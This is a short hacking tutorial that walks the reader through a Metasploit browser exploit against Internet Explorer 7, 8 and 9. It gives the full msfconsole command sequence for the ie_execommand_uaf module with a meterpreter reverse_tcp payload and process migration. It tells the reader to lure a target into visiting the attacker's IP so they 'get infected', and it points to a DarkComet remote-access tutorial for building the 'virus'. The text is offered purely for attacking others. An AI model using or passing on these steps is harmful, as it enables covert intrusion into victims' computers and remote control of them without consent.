IE EXPLOIT
This exploit takes advantage of an exploit in Internet Explorer 7, 8, and 9, which is unpatched as of 9/23/2012. It allows you to install your server or virus on a targets computer through their browser (internet explorer).
What you need:
- A server or virus to send to the target. Refer to the DarkComet tutorial for an example of how to make one.
- Metasploit (comes with BackTrack. Setup instructions for setting this up can be found in this app.)
- Start up msfconsole, and enter the following commands:use exploit/windows/browser/ie_execommand_uafset PAYLOAD windows/meterpreter/reverse_tcp (can be arbitrary, type show payloads to see what you want)The next 2 commands are only required for reverse payloads, and may be skipped.set LHOST 0.0.0.0 (Your IP address)set LPORT 443 (can be arbitrary)set SRVHOST 0.0.0.0 (can be arbitrary IP to host server, if you have bind access. Otherwise use yourself.)set SRVPORT 80 (for direct HTTP, can be changed)set URIPATH / (can be arbitrary, is basically the path after your ip [e.g 0.0.0.0/mypath can be just / if they connect directly])set AutoRunScript migrate -f (use for meterpreter to move from browser process which can be closed)exploit (runs your server)
- You’re done! Now just get someone to connect to your IP with Internet Explorer, and they should get infected!
Credits for this tutorial go to zenforic!